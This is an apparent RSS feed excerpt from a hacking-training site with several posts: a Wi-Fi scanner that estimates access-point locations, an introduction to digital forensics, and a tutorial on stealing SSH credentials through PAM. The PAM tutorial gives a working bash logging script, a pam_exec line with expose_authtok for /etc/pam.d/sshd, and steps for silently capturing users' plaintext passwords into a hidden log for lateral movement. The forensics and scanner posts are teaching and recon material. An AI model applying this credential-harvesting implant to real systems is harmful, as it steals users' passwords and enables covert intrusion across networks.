To join this training, become a<a href="https://hackersarise.thinkific.com/bundles/subscriber" rel="noreferrer noopener" target="_blank"> Subscriber at Hackers-Arise</a> and get this and over 40 other courses.
If you just want the CISSP training, you can purchase <a href="https://hackersarise.thinkific.com/courses/CISSP-Bootcamp" rel="noreferrer noopener" target="_blank">the training separately here for just $199.</a>
The post <a href="https://hackers-arise.com/it-s-time-to-elevate-your-cybersecurity-game-earn-the-crown-jewel-of-cybersecurity-certifications/">It’s Time to Elevate Your Cybersecurity Game! Earn the Crown Jewel of Cybersecurity Certifications!</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</title>
<link>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/</link>
<comments>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Thu, 11 Sep 2025 19:36:56 +0000</pubDate>
<category><![CDATA[Python]]></category>
<category><![CDATA[Scripting]]></category>
<category><![CDATA[Wi-Fi Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=16533</guid>
<description><![CDATA[Hackers Arise Wi-Fi Radar Welcome back, aspiring cyberwarriors! One of our advanced student who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is it’s ability to locate the Wi-Fi access points (AP) in your area. I”ll […]
The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[<h1 class="wp-block-heading">Hackers Arise Wi-Fi Radar </h1>

<h2 class="wp-block-heading">Welcome back, aspiring cyberwarriors!</h2>

One of our advanced student who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is it’s ability to locate the Wi-Fi access points (AP) in your area.

I”ll let him introduce his new tool below!
In the Wi-Fi domain, raw signal strength and MAC identifiers can reveal more than just the presence of networks — they can open a path to estimating physical distance, mapping access points, and even executing wardriving missions or indoor localization without GPS. If you’ve ever wanted to push the boundaries of Wi-Fi auditing beyond mere detection, Hackers Arise Radar is your next-level tool.
<h2 class="wp-block-heading">Why this Tool is Game Changing</h2>
Just like Wigle.net collects crowdsourced location data of APs, this project allows you to discover and map Wi-Fi access points in real-time using only your Linux laptop or USB Wi-Fi adapter. 
With this tool, you’ll get:
– Continuous scans over 2.4 GHz, 5 GHz, 6 GHz, or all bands – Fully automated interface setup (monitor mode, regulatory domain, TX power) – Filtered and smoothed RSSI values with Kalman filtering – On-demand calibration for RSSI-to-distance – Spring-model map generation to visualize spatial relationships – Exportable logs, visuals, and calibration profiles for future use
Whether you’re driving through a city, walking indoors, or performing a pentest, you can leverage this tool for actionable location data.
<h2 class="wp-block-heading">How it Works – Step by Step</h2>
Step #1. Launch & Configuration
 Start the script:
 kali > sudo python3 Hackers_Arise_Radar.py
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="579" height="229" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png" alt="" class="wp-image-16717" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png 579w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation-300x119.png 300w" sizes="(max-width: 579px) 100vw, 579px" /></figure>
You’ll be greeted with a colorful terminal interface that guides you through:
 – Selecting your Wi-Fi interface – Choosing the operational environment (indoor, urban, open space) – Selecting scan band (2.4 GHz / 5 GHz / 6 GHz / All)
No need to manually enable monitor mode – the script automatically puts your adapter into monitor mode, sets the regulatory domain, and adjusts TX power based on your choices.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="899" height="822" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png" alt="" class="wp-image-16720" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png 899w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-300x274.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-768x702.png 768w" sizes="(max-width: 899px) 100vw, 899px" /></figure>
Step #2. Real-Time Wi-Fi Scanning
 The script uses airodump-ng behind the scenes to: – Continuously scan surrounding Wi-Fi networks – Record BSSID, SSID, RSSI, channel, frequency band – Stream live updates through a structured CSV output for parsing and analysis
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="720" height="598" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png" alt="" class="wp-image-16718" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png 720w, https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan-300x249.png 300w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
Step #3. RSSI Filtering & Analytics
 To reduce RSSI noise, the script implements a Kalman filter This Kalman filter:
 – Smooths out transient signal spikes – Creates a rolling average of RSSI per BSSID – Improves distance estimation consistency
Step #4. Estimating Distance from RSSI
 The tool calculates the distance using a log-distance path loss model such as:
 d = 10^((TX_power – RSSI) / (10 * n))
Where: – TX_power and path-loss exponent n are customizable or calculated through calibration – RSSI is dynamically filtered – Distance is measured in meters
Step #5. Calibration Engine
 The included calibration module lets you:
 – Input known RSSI and real-world distances – Fit an optimized curve per BSSID – Automatically store TX power, path-loss exponent, and R² fit for reuse – Flag poorly calibrated networks with suggestions
Step #6. Visual Mapping – Spring Model Layout
 Once enough data is gathered, the tool uses a spring-model algorithm to create a map: – Nodes (BSSIDs) are arranged based on estimated distances – Forces push/pull the layout into geometric balance – Labels show SSIDs, bands, and estimated distance in meters

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="803" height="644" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png" alt="" class="wp-image-16719" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png 803w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-300x241.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-768x616.png 768w" sizes="(max-width: 803px) 100vw, 803px" /></figure>
Step #7. Regulatory & Power Tuning Mode
 The tool isn’t just a scanner — it includes a dedicated utility mode to:
 – Set regulatory domain (iw reg set <country_code>) – Modify TX power (in dBm) – Retrieve and display current wireless driver info – Perform diagnostics before scanning
<h2 class="wp-block-heading">Focus Mode: Tracking a Single Access Point</h2>
Sometimes you just need to follow one Wi-Fi target — whether it’s a rogue device, a signal beacon, or an access point you’re using for indoor positioning.
Hackers Arise Radar includes a specialized mode for scanning and tracking a single BSSID:
 – Select a known access point from your previously scanned list – The tool locks onto that specific MAC address using: airodump-ng –bssid <target> –channel <ch> – RSSI values are filtered using a Kalman filter – Distance estimation is updated in real-time using the calibration profile – Live updates show proximity and confidence
<h2 class="wp-block-heading">Real World Use Cases</h2>
– Wardriving Missions: Continuous logs while driving – Indoor Wireless Mapping: Signal-based AP triangulation, spatial layouts – Security & Pentesting Recon: Detect new/rogue APs, estimate proximity – Wi-Fi Optimization: Adjust regulatory domain / TX power, evaluate coverage – Wireless Simulation & Testing: Simulate RSSI data with simulate_rss_matrix.py
<h2 class="wp-block-heading">Requirements & Setup</h2>
– Platform: Linux (Kali/Debian-based) – Python: 3.7+ – Privileges: sudo required – External Tools: aircrack-ng, iw, ip, ethtool – Python Libraries: numpy, scipy, pandas, matplotlib, adjustText
Launch simply with:
 kali> sudo python3 Hackers_Arise_Radar.py
 No need to prep interfaces — the tool handles it all.
<h2 class="wp-block-heading">Summary</h2>
Hackers Arise Radar is more than just a scanner. It is a fully interactive system for Wi-Fi discovery, proximity estimation, map generation, and interface configuration — all controlled through an elegant terminal menu.
Built for hackers, engineers, educators, and hobbyists, this tool empowers you to: – Visualize your wireless environment – Optimize TX power and regulatory settings – Log and export clean data – Build wireless maps with zero GPS
Start scanning smarter — not harder.

For more information on this unique and powerful scanner, see our Wi-Fi Hacking training.
The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Password Cracking: Stealing SSH Credentials with PAM</title>
<link>https://hackers-arise.com/password-cracking-stealing-ssh-credentials-with-pam/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Thu, 11 Sep 2025 14:49:14 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Linux]]></category>
<category><![CDATA[Password Cracking]]></category>
<category><![CDATA[Pentesting]]></category>
<category><![CDATA[Credential Harvesting]]></category>
<category><![CDATA[HACKING]]></category>
<category><![CDATA[lateral movement]]></category>
<category><![CDATA[linux]]></category>
<category><![CDATA[offensive security]]></category>
<category><![CDATA[PAM]]></category>
<category><![CDATA[persistence]]></category>
<category><![CDATA[post-exploitation]]></category>
<category><![CDATA[Red Team]]></category>
<category><![CDATA[SSH]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17993</guid>
<description><![CDATA[Patch PAM on Linux to harvest SSH credentials in real time. By adding a logging script into the authentication chain, every password-based login is silently captured.
The post <a href="https://hackers-arise.com/password-cracking-stealing-ssh-credentials-with-pam/">Password Cracking: Stealing SSH Credentials with PAM</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
Landing on a Linux machine after exploitation or with freshly harvested credentials often feels like a victory, but in reality, it is only the beginning of the struggle. Lateral movement in Linux environments is notoriously trickier than in Windows domains. Even if you manage to obtain root on one host, you might quickly hit a wall: you see evidence of users connecting to other systems, but you don’t have their credentials. Without those, further expansion stalls. Techniques such as dumping memory or scraping process data might work in some cases, but SSH processes in particular won’t reveal user credentials so easily. At first glance, it feels like a dead end.
This is where PAM manipulation comes into play. By modifying how the Pluggable Authentication Module handles logins, it becomes possible to quietly capture user credentials whenever they authenticate. This is how you create a systematic way to harvest SSH passwords and reuse them for lateral movement.
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="711" height="157" src="https://hackers-arise.com/wp-content/uploads/2025/09/1-harvsted-credentilas-demonstration.webp" alt="pam patch in action logging credentials" class="wp-image-17994" style="width:750px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/1-harvsted-credentilas-demonstration.webp 711w, https://hackers-arise.com/wp-content/uploads/2025/09/1-harvsted-credentilas-demonstration-300x66.webp 300w" sizes="(max-width: 711px) 100vw, 711px" /></figure>
<h2 class="wp-block-heading">Recon with Known Hosts</h2>
Before diving into PAM patching, it is useful to gather some context about the network and where legitimate users are connecting. SSH clients store previously accessed servers in a <code>known_hosts</code> file under each user’s <code>.ssh</code> directory. If those files are accessible, they give a list of destinations without the need for noisy scanning. For example, inspecting <code>/home/dev3/.ssh/known_hosts</code> might reveal entries such as <code>git</code>. That single clue suggests a pivot point. If the compromised machine is in a restricted environment, that host may sit in another subnet or behind access controls you couldn’t otherwise reach. With the right credentials, this file becomes a roadmap for lateral movement.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="773" height="118" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-demonstrating-hosts-in-known_hosts.webp" alt="using known_hosts file for lateral movement" class="wp-image-17995" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-demonstrating-hosts-in-known_hosts.webp 773w, https://hackers-arise.com/wp-content/uploads/2025/09/2-demonstrating-hosts-in-known_hosts-300x46.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/2-demonstrating-hosts-in-known_hosts-768x117.webp 768w" sizes="(max-width: 773px) 100vw, 773px" /></figure>
<h2 class="wp-block-heading">Preparing the Host</h2>
Before implementing a credential capture mechanism, it’s important to ensure the host accepts password-based logins. SSHD can be configured to forbid password authentication entirely, relying solely on key-based access. To enable credential capture, the following must be set in <code>/etc/ssh/sshd_config</code>:
<code>target# > nano /etc/ssh/sshd_config</code>
<code>PasswordAuthentication yes</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="834" height="289" src="https://hackers-arise.com/wp-content/uploads/2025/09/3-enabling-password-authentication.webp" alt="password authentication with ssh enabled" class="wp-image-17996" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/3-enabling-password-authentication.webp 834w, https://hackers-arise.com/wp-content/uploads/2025/09/3-enabling-password-authentication-300x104.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/3-enabling-password-authentication-768x266.webp 768w" sizes="(max-width: 834px) 100vw, 834px" /></figure>
Once this change is in place, the groundwork is set.
<h2 class="wp-block-heading">Creating a Logging Script</h2>
The next step is creating a small script that will record login attempts. With root privileges, create a new file at <code>/usr/local/bin/logc.sh</code>:
<code>target# > nano /usr/local/bin/logc.sh</code> 
<pre class="wp-block-code"><code>#!/bin/bash
echo "$(date) User: $PAM_USER Password: $(cat -), From: $PAM_RHOST" >> /var/log/.authc.log</code></pre>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="164" src="https://hackers-arise.com/wp-content/uploads/2025/09/4-creating-a-logging-script.webp" alt="creating a PAM Patch" class="wp-image-17997" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/4-creating-a-logging-script.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/4-creating-a-logging-script-300x51.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/4-creating-a-logging-script-768x130.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
Make it executable:
<code>target# > chmod 777 /usr/local/bin/logc.sh</code>
Then prepare the hidden log file that will quietly collect captured data:
<code>target# > touch /var/log/.authc.log</code>
This script is simple yet powerful. It captures the username, the plaintext password, the source of the connection, and timestamps each entry.
<h2 class="wp-block-heading">Patching PAM</h2>
With the logging script in place, the next task is to insert it into the PAM authentication chain. PAM configurations vary slightly between distributions, but for SSH specifically, the relevant file is <code>/etc/pam.d/sshd</code>. For broader system-wide coverage, other files such as <code>/etc/pam.d/common-auth</code> (Debian/Ubuntu) or <code>/etc/pam.d/password-auth</code> (CentOS) could be patched instead.
To modify SSH authentication only, open <code>/etc/pam.d/sshd</code> and add the following line at the very top:
<code>target# > nano /etc/pam.d/sshd</code>
<pre class="wp-block-code"><code><code>auth optional pam_exec.so quiet expose_authtok /usr/local/bin/logc.sh</code></code></pre>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="994" height="243" src="https://hackers-arise.com/wp-content/uploads/2025/09/5-patching-pam.webp" alt="patching PAM to steal ssh credentials" class="wp-image-17998" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/5-patching-pam.webp 994w, https://hackers-arise.com/wp-content/uploads/2025/09/5-patching-pam-300x73.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/5-patching-pam-768x188.webp 768w" sizes="(max-width: 994px) 100vw, 994px" /></figure>
This ensures that every authentication attempt, successful or not, passes through the logging script before continuing with normal PAM processing. Credentials are silently exfiltrated while legitimate users remain unaware.
<h2 class="wp-block-heading">Applying and Testing the Patch</h2>
For the changes to take effect, restart the SSH service:
<code>target# > service sshd restart</code>
Once restarted, test the patch by logging in with valid credentials.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="698" height="122" src="https://hackers-arise.com/wp-content/uploads/2025/09/6-testing-ssh-auth-after-the-patch.webp" alt="testing the PAM patch" class="wp-image-17999" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/6-testing-ssh-auth-after-the-patch.webp 698w, https://hackers-arise.com/wp-content/uploads/2025/09/6-testing-ssh-auth-after-the-patch-300x52.webp 300w" sizes="(max-width: 698px) 100vw, 698px" /></figure>
Afterwards, check the log file:
<code>target# > cat /var/log/.authc.log</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="833" height="157" src="https://hackers-arise.com/wp-content/uploads/2025/09/7-the-patch-is-valid.webp" alt="the PAM patch is valid and working" class="wp-image-18000" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/7-the-patch-is-valid.webp 833w, https://hackers-arise.com/wp-content/uploads/2025/09/7-the-patch-is-valid-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/7-the-patch-is-valid-768x145.webp 768w" sizes="(max-width: 833px) 100vw, 833px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="788" height="159" src="https://hackers-arise.com/wp-content/uploads/2025/09/8-more-creds-accumulated-in-a-few-days-after-the-patch.webp" alt="more credentials were obtained with the PAM patch" class="wp-image-18001" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/8-more-creds-accumulated-in-a-few-days-after-the-patch.webp 788w, https://hackers-arise.com/wp-content/uploads/2025/09/8-more-creds-accumulated-in-a-few-days-after-the-patch-300x61.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/8-more-creds-accumulated-in-a-few-days-after-the-patch-768x155.webp 768w" sizes="(max-width: 788px) 100vw, 788px" /></figure>
Each entry should display the captured user, the password they entered, the remote host they connected from, and the date of the attempt. Over time, this log will accumulate valuable credentials from legitimate user sessions, giving you a resource for lateral movement.
<h2 class="wp-block-heading">Summary</h2>
There is a great method of harvesting SSH credentials on Linux by modifying the Pluggable Authentication Module (PAM). After identifying potential lateral movement targets via <code>known_hosts</code>, SSH is reconfigured to allow password authentication. A custom logging script is created to capture usernames, passwords, and remote sources, and is then integrated into PAM by editing <code>/etc/pam.d/sshd</code>. With the patch in place, every login attempt is silently recorded to a hidden log file. Restarting SSH activates the change, and future connections yield a steady stream of usable credentials. The post <a href="https://hackers-arise.com/password-cracking-stealing-ssh-credentials-with-pam/">Password Cracking: Stealing SSH Credentials with PAM</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Digital Forensics: Getting Started Becoming a Forensics Investigator</title>
<link>https://hackers-arise.com/digital-forensics-getting-started-becoming-a-forensics-investigator/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Wed, 10 Sep 2025 13:50:08 +0000</pubDate>
<category><![CDATA[Defensive Security]]></category>
<category><![CDATA[Digital Forensics]]></category>
<category><![CDATA[Mobile Forensics]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[Cybercrime]]></category>
<category><![CDATA[Evidence Collection]]></category>
<category><![CDATA[Forensic Imaging]]></category>
<category><![CDATA[incident response]]></category>
<category><![CDATA[Investigation Tools]]></category>
<category><![CDATA[Memory Forensics]]></category>
<category><![CDATA[Network Forensics]]></category>
<category><![CDATA[Timeline Analysis]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18007</guid>
<description><![CDATA[This guide maps out the investigative process and introduces the essential utilities every analyst should know.
The post <a href="https://hackers-arise.com/digital-forensics-getting-started-becoming-a-forensics-investigator/">Digital Forensics: Getting Started Becoming a Forensics Investigator</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome, aspiring forensic investigators! 

Welcome to the new Digital Forensics module. In this guide we introduce digital forensics, outline the main phases of a forensic investigation, and survey a large set of tools you’ll commonly meet. Think of this as a practical map: the article briefly covers the process and analysis stages and points to tools you can use depending on your objectives. Later in the course we’ll dig deeper into Windows and Linux artifacts and show how to apply the most common tools to real cases.
Digital forensics is growing fast because cyber incidents are happening every day. Budget limits, legacy systems, and weak segmentation leave many organizations exposed. AI and automation make attacks easier and fasterю. Human mistakes, especially successful phishing, remain a top cause of breaches. When prevention fails, digital forensics helps answer what happened, how it happened, and what to do next. It’s a mix of technical skills, careful procedure, and clear reporting.
<h2 class="wp-block-heading">What is Digital Forensics?</h2>
Digital forensics (also called computer forensics or cyber forensics) is the discipline of collecting, preserving, analyzing, and presenting digital evidence from computers, servers, mobile devices, networks, and storage media. It grew from early law-enforcement needs in the 1980s into a mature field in the 1990s and beyond, as cybercrime increased and investigators developed repeatable methods.
Digital forensics supports incident response, fraud investigations, data recovery, and threat hunting. The goals are to reconstruct timelines, identify malicious activity, measure impact, and produce evidence suitable for legal, regulatory, or incident-response use.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="640" height="427" src="https://hackers-arise.com/wp-content/uploads/2025/09/1-digital-forensics-lab.webp" alt="digital forensics specialists analyzing the hardware" class="wp-image-18008" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/1-digital-forensics-lab.webp 640w, https://hackers-arise.com/wp-content/uploads/2025/09/1-digital-forensics-lab-300x200.webp 300w" sizes="(max-width: 640px) 100vw, 640px" /></figure>
<h2 class="wp-block-heading">Main Fields Inside Digital Forensics</h2>
Digital forensics branches into several focused areas. Each requires different tools and approaches.
<h3 class="wp-block-heading">Computer forensics</h3>
Focuses on artifacts from a single machine: RAM, disk images, the Windows registry, system logs, file metadata, deleted files, and local application data. The aim is to recreate what a user or a piece of malware did on that host.
<h3 class="wp-block-heading">Network forensics</h3>
Covers packet captures, flow records, and logs from routers, firewalls and proxies. Analysts use network data to trace communications, find command-and-control channels, spot data exfiltration, and follow attacker movement across infrastructure.
<h3 class="wp-block-heading">Forensic data analysis</h3>
Deals with parsing and interpreting files, database contents, and binary data left after an intrusion. It includes reverse engineering malware fragments, reconstructing corrupted files, and extracting meaningful information from raw or partially damaged data.
<h3 class="wp-block-heading">Mobile device forensics</h3>
Targets smartphones and tablets. Android and iOS store data differently from desktops, so investigators use specialized methods to extract messages, app data, calling records, and geolocation artifacts.
<h3 class="wp-block-heading">Hardware forensics</h3>
The most specialized area: low-level analysis of firmware, microcontrollers, and embedded devices. This work may involve extracting firmware from chips, analyzing device internals, or studying custom hardware behavior (for example, the firmware of an IoT transmitter or a skimmer installed on an ATM).
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="640" height="427" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-hardware-forensic-analysis.webp" alt="hardware forensics" class="wp-image-18009" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-hardware-forensic-analysis.webp 640w, https://hackers-arise.com/wp-content/uploads/2025/09/2-hardware-forensic-analysis-300x200.webp 300w" sizes="(max-width: 640px) 100vw, 640px" /></figure>
<h2 class="wp-block-heading">Methods and approaches</h2>
Digital forensics work generally falls into two modes: static (offline) analysis and live (in-place) analysis. Both are valid. The choice depends on goals and constraints.
Static analysis
The traditional workflow. Investigators take the device offline, build a bit-for-bit forensic image, and analyze copies in a lab. Static analysis is ideal for deep disk work: carving deleted files, examining file system metadata, and creating a defensible chain of custody for evidence.
Live analysis
Used when volatile data matters or when the system cannot be taken offline. Live techniques capture RAM contents, running processes, open network connections, and credentials kept in memory. Live collection gives access to transient artifacts that vanish on reboot, but it requires careful documentation to avoid altering evidence.
Live vs Static
Static work preserves the exact state of disk data and is easier to reproduce. Live work captures volatile evidence that static imaging cannot. Modern incidents often need both. They start with live capture to preserve RAM and active state, then create static images for deeper analysis.
<h2 class="wp-block-heading">The forensic process</h2>
1. Create a forensic image
Make a bit-for-bit copy of storage or memory. Work on the copy. Never change the original.
2. Document the system’s state
Record running processes, network connections, logged-in users, system time, and any other volatile details before power-down.
3. Identify and preserve evidence
Locate files, logs, configurations, memory dumps, and external devices. Preserve them with hashes and a clear chain of custody.
4. Analyze the evidence
Use appropriate tools to inspect logs, binaries, file systems, and memory. Look for malware artifacts, unauthorized accounts, and modified system components.
5. Timeline analysis
Correlate timestamps across artifacts to reconstruct the sequence of events and show how an incident unfolded.
6. Identify indicators of compromise (IOCs)
Extract file hashes, IP addresses, domains, registry keys, and behavioral signatures that indicate malicious activity.
7. Report and document
Produce a clear, well-documented report describing methods, findings, conclusions, and recommended next steps.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="640" height="435" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-mobile-forensics.webp" alt="mobile forensics" class="wp-image-18010" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-mobile-forensics.webp 640w, https://hackers-arise.com/wp-content/uploads/2025/09/2-mobile-forensics-300x204.webp 300w" sizes="(max-width: 640px) 100vw, 640px" /></figure>
<h2 class="wp-block-heading">Toolset Overview</h2>
Below is a compact reference to common tools grouped by purpose. Later modules will show hands-on use for Windows and Linux artifacts.
<h3 class="wp-block-heading">Imaging and acquisition</h3>
FTK Imager — Windows tool for creating forensic copies and basic preview.
dc3dd / dcfldd — Forensic versions of dd with improved logging and hashing.
Guymager — Fast, reliable imaging with a GUI.
DumpIt / Magnet RAM Capture — Simple, effective RAM capture utilities.
Live RAM Capturer — For memory collection from live systems.
<h3 class="wp-block-heading">Image mounting and processing</h3>
Imagemounter — Mount images for read-only analysis.
Libewf — Support for EnCase Evidence File format.
Xmount — Convert and remap image formats for flexible analysis.
<h3 class="wp-block-heading">File and binary analysis</h3>
HxD / wxHexEditor / Synalyze It! — Hex editors for direct file and binary inspection.
Bstrings — Search binary images with regex for hidden strings.
Bulk_extractor — Extract emails, credit card numbers, and artifacts from disk images.
PhotoRec — File carving and deleted file recovery.
<h3 class="wp-block-heading">Memory and process analysis</h3>
Volatility / Rekall — Industry standard frameworks for memory analysis and artifact extraction.
Memoryze — RAM analysis, including swap and process memory.
KeeFarce — Extracts KeePass data from memory snapshots.
<h3 class="wp-block-heading">Network and browser forensics</h3>
Wireshark — Packet capture and deep protocol analysis.
SiLK — Scalable flow collection and analysis for large networks.
NetworkMiner — Passive network forensics that rebuilds sessions and files.
Hindsight / chrome-url-dumper — Recover browser history and user activity from Chrome artifacts.
<h3 class="wp-block-heading">Mail and messaging analysis</h3>
PST/OST/EDB Viewers — Tools to inspect Exchange and Outlook data files offline.
Mail Viewer — Supports multiple mailstore formats for quick inspection.
<h3 class="wp-block-heading">Disk and filesystem utilities</h3>
The Sleuth Kit / Autopsy — Open-source forensic platform for disk analysis and timeline creation.
Digital Forensics Framework — Modular platform for file and system analysis.
<h3 class="wp-block-heading">Specialized extraction and searching</h3>
FastIR Collector — Collects live forensic artifacts from Windows hosts quickly.
FRED — Registry analysis and parsing.
NTFS USN Journal Parser / RecuperaBit — Recover change history and reconstruct deleted/changed files.
<h3 class="wp-block-heading">Evidence processing and reporting</h3>
EnCase — Commercial suite for imaging, analysis, and court-ready reporting.
Oxygen Forensic Detective — Strong platform for mobile device extraction and cloud artifact analysis.
<h2 class="wp-block-heading">Practical notes and best practices</h2>
a) Preserve original evidence. Always work with verified copies and record cryptographic hashes.
b) Capture volatile data early. RAM and live state can vanish on reboot. Prioritize their collection when necessary.
c) Keep clear records. Document every action, including tools and versions, timestamps, and the chain of custody.
d) Match tools to goals. Use lightweight tools for quick triage and more powerful suites for deep dives.
e) Plan for scalability. Network forensics can generate huge data sets. Prepare storage and filtering strategies ahead of time.
<h2 class="wp-block-heading">Summary</h2>
We introduced digital forensics and laid out the main concepts you’ll need to start practical work: the different forensic disciplines, the distinction between live and static analysis, a concise process checklist, and a broad toolset organized by purpose. Digital forensics sits at the intersection of incident response, threat intelligence, and legal evidence collection. The methods and tools presented here form a foundation. In later lessons we’ll work through hands-on examples for Windows and Linux artifacts, demonstrate key tools in action, and show how to build timelines and extract actionable IOCs.
Keep in mind that good forensic work is disciplined, repeatable, and well documented. That’s what makes the evidence useful and the investigation reliable.
If you need forensic assistance, we offer professional services to help investigate and mitigate incidents. Additionally, we provide classes on digital forensics for those looking to expand their skills and understanding in this field.The post <a href="https://hackers-arise.com/digital-forensics-getting-started-becoming-a-forensics-investigator/">Digital Forensics: Getting Started Becoming a Forensics Investigator</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Can Hackers “See” Inside Your Home Using Wi-Fi to Track Your Location and Movement?</title>
<link>https://hackers-arise.com/can-hackers-see-inside-your-home-using-wi-fi-to-tr/</link>
<comments>https://hackers-arise.com/can-hackers-see-inside-your-home-using-wi-fi-to-tr/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Wed, 10 Sep 2025 04:11:00 +0000</pubDate>
<category><![CDATA[Bluetooth Hacking]]></category>
<category><![CDATA[Cyber Threat Intelligence]]></category>
<category><![CDATA[Cybersecurity Tools]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hardware Hacking]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[Mobile Hacking]]></category>
<category><![CDATA[Wi-Fi Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15849</guid>
<description><![CDATA[Welcome back, my aspiring cyberwarriors! The quick answer is “Yes!”. It might seem like science fiction, but now we have the capability to “see” through walls and track the location and movement of targets. This is thanks to new technological developments in both artificial intelligence and SDR. Remember, Wi-Fi is simply sending and receiving radio […]
The post <a href="https://hackers-arise.com/can-hackers-see-inside-your-home-using-wi-fi-to-tr/">Can Hackers “See” Inside Your Home Using Wi-Fi to Track Your Location and Movement?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
